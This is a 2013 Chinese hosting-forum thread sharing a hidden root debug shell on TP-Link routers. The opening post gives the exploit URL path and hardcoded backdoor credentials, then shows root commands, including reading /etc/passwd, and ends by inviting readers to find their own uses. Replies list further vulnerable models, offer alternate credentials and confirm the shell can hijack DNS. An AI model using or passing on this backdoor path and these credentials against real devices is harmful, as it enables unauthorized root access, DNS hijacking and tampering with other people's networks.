全球主机交流论坛
标题:
【干货】TP-LINK用户的福利之路由器shell
[打印本页]
作者:
过客
时间:
2013-5-26 19:24
标题:
【干货】TP-LINK用户的福利之路由器shell
本帖最后由 过客 于 2013-5-26 19:26 编辑
TP-Link WDR740ND/WDR740N 路由器有一个隐藏的调试功能的shell,可以root权限,可能会被攻击者滥用。
固件版本:3.12.11 Build 111130 Rel.55312n and possibly others
exp url : http://IP/userRpmNatDebugRpm26525557/linux_cmdline.html
User: osteam Password: 5up
使用这个shell 攻击者可能会添加恶意的路由规则或更改配置文件。
==============以上是废话==============
过客的路由器是:TP-Link TL-WR941N
软件版本:3.11.7 Build 100723 Rel.46142n
硬件版本:WR941N v4/v5 00000000
开始测试:
cat /proc/cpuinfo&
827
# system type : Atheros AR7240 (Python)
processor : 0
cpu model : MIPS 24K V7.4
BogoMIPS : 265.21
wait instruction : yes
microsecond timers : yes
tlb_entries : 16
extra interrupt vector : yes
hardware watchpoint : yes
ASEs implemented : mips16
VCED exceptions : not available
VCEI exceptions : not available
cat /etc/passwd&
828
# root:x:0:0:root:/root:/bin/sh
Admin:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:65534:65534:nobody:/home:/bin/sh
ap71:x:500:0:Linux User,,,:/root:/bin/sh
cat /proc/meminfo&
843
# MemTotal: 30676 kB
MemFree: 12876 kB
Buffers: 1836 kB
Cached: 6056 kB
SwapCached: 0 kB
Active: 6116 kB
Inactive: 3892 kB
HighTotal: 0 kB
HighFree: 0 kB
LowTotal: 30676 kB
LowFree: 12876 kB
SwapTotal: 0 kB
SwapFree: 0 kB
Dirty: 0 kB
Writeback: 0 kB
Mapped: 4276 kB
Slab: 5436 kB
CommitLimit: 15336 kB
Committed_AS: 4324 kB
PageTables: 276 kB
VmallocTotal: 1048560 kB
VmallocUsed: 1944 kB
VmallocChunk: 1046464 kB
# ls /
bin etc linuxrc proc sbin usr web
dev lib mnt root tmp var
#
复制代码
至于利用这个东西能干啥……那就自己发挥吧,走了。
(, 下载次数: 5)
上传
点击文件名下载附件
作者:
a35253283
时间:
2013-5-26 19:25
额,好牛逼的样子
作者:
Zoplor
时间:
2013-5-26 19:26
我不懂
作者:
bnb345
时间:
2013-5-26 19:31
哦。
作者:
wos1945
时间:
2013-5-26 19:34
不错。。。
作者:
恋爱ing
时间:
2013-5-26 19:35
谢谢分享
作者:
东方星雨
时间:
2013-5-26 19:38
不懂,能蹭网不
作者:
link
时间:
2013-5-26 19:41
不懂。。可以劫持DNS吗?
作者:
ybs885
时间:
2013-5-26 19:51
不错啊分享
作者:
莎士比亚
时间:
2013-5-26 20:02
学习了
作者:
哥坏人
时间:
2013-5-26 20:05
80端口被封,还是好事
作者:
yohu
时间:
2013-5-26 20:06
有root,不如编译个lnmp,挂载个硬盘,直接当服务器好了。
作者:
DOS
时间:
2013-5-26 20:09
唔,有大危害么?有的话发乌云吧。
作者:
过客
时间:
2013-5-26 20:13
link 发表于 2013-5-26 19:41
不懂。。可以劫持DNS吗?
可以,具体百度。
作者:
zt1993
时间:
2013-5-26 20:19
密码不对,。。
作者:
skwinx
时间:
2013-5-26 20:24
2041n 也有 不过密码错了
作者:
skwinx
时间:
2013-5-26 20:28
2041N 我也进去了 账户是 admin admin
作者:
来自未来的家伙
时间:
2013-5-26 20:35
很流弊的样子
作者:
ulmate01
时间:
2013-5-26 20:40
刷路由到底要干嘛呢。。。
作者:
基长
时间:
2013-5-26 20:46
841n刚才试了下也可以
——来自基长的云签名
作者:
datou
时间:
2013-5-26 20:52
本帖最后由 datou 于 2013-5-26 20:53 编辑
fw300r中枪
不过没啥意义,外网访问不鸟
作者:
wmfy808
时间:
2013-5-26 21:04
WDR4320无效
作者:
Kslr
时间:
2013-5-26 21:10
进来学习一下
作者:
hxhui
时间:
2013-5-26 21:12
好牛逼的样子
作者:
hackfengl
时间:
2013-5-26 21:12
从界面来看 感觉是人家公司故意留的这么一个后门
作者:
rqliang
时间:
2013-5-26 21:38
不要干坏事
作者:
sdgl212
时间:
2013-5-26 22:13
不懂
作者:
waf7225
时间:
2013-5-26 22:33
openwrt无压力.
作者:
a219549
时间:
2013-5-26 22:39
好高端。。。
作者:
气味
时间:
2013-5-27 11:55
不明觉厉……
作者:
qqcm
时间:
2013-5-27 12:23
不能刷openwrt或ddwrt,可以添加转向弄tb客
作者:
wenhold
时间:
2013-5-27 12:26
表示741n 2年前已被我刷成openwrt 乱玩参数,砖了几年了
作者:
sv2222
时间:
2013-5-27 12:29
tp-link都有么?
作者:
过客
时间:
2013-5-27 14:07
sv2222 发表于 2013-5-27 12:29
tp-link都有么?
测试一下就知道
作者:
nodhost
时间:
2013-5-27 15:17
makr
作者:
junhan
时间:
2013-6-17 15:48
841试了一下也行
作者:
xspoco
时间:
2013-6-17 15:54
看起来碉堡了
作者:
气味
时间:
2013-6-17 16:25
作者:
paopao00
时间:
2013-6-17 16:29
这个有点用啊
欢迎光临 全球主机交流论坛 (https://52.ht/)
Powered by Discuz! X3.4
不错。。。
80端口被封,还是好事 2041n 也有 不过密码错了 
——来自基长的云签名
